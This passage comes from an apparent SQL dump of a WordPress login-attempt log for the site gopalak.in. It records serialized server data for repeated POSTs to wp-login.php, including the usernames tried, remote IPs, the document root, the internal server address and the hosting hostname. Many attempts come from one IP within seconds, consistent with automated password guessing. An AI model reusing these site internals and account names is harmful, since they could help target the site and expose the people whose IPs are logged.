bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49592\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746048888.825881;s:12:\"REQUEST_TIME\";i:1746048888;}}','196.251.112.104',1,'2025-05-01 03:04:50','2025-05-01 03:14:50'),(94660,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45344\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.132.28\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746049056.586025;s:12:\"REQUEST_TIME\";i:1746049056;}}','66.102.132.28',0,'2025-05-01 03:07:39','1970-01-01 00:00:00'),(94661,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36696\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.128.27\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746049364.62555;s:12:\"REQUEST_TIME\";i:1746049364;}}','66.102.128.27',0,'2025-05-01 03:12:46','1970-01-01 00:00:00'),(94662,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51585\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746049575.871619;s:12:\"REQUEST_TIME\";i:1746049575;}}','196.251.112.104',1,'2025-05-01 03:16:17','2025-05-02 03:41:30'),(94663,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51587\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746049575.8914621;s:12:\"REQUEST_TIME\";i:1746049575;}}','196.251.112.104',1,'2025-05-01 03:16:17','2025-05-02 03:41:30'),(94664,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51584\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746049575.87238;s:12:\"REQUEST_TIME\";i:1746049575;}}','196.251.112.104',1,'2025-05-01 03:16:17','2025-05-02 03:41:30'),(94665,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51590\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746049575.9101961;s:12:\"REQUEST_TIME\";i:1746049575;}}','196.251.112.104',1,'2025-05-01 03:16:17','2025-05-02 03:41:30'),(94666,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51592\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746049575.971926;s:12:\"REQUEST_TIME\";i:1746049575;}}','196.251.112.104',1,'2025-05-01 03:16:17','2025-05-02 03:41:30'),(94667,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35586\";s:11:\"REMOTE_ADDR\";s:12:\"78.128.8.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746049672.1670671;s:12:\"REQUEST_TIME\";i:1746049672;}}','78.128.8.148',0,'2025-05-01 03:17:53','1970-01-01 00:00:00'),(94668,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"121\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52124\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"121\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746049733.272577;s:12:\"REQUEST_TIME\";i:1746049733;}}','196.251.112.104',1,'2025-05-01 03:18:54','2025-05-02 03:41:30'),(94669,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52128\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746049733.3071871;s:12:\"REQUEST_TIME\";i:1746049733;}}','196.251.112.104',1,'2025-05-01 03:18:54','2025-05-02 03:41:30'),(94670,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52129\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746049733.311703;s:12:\"REQUEST_TIME\";i:1746049733;}}','196.251.112.104',1,'2025-05-01 03:18:55','2025-05-02 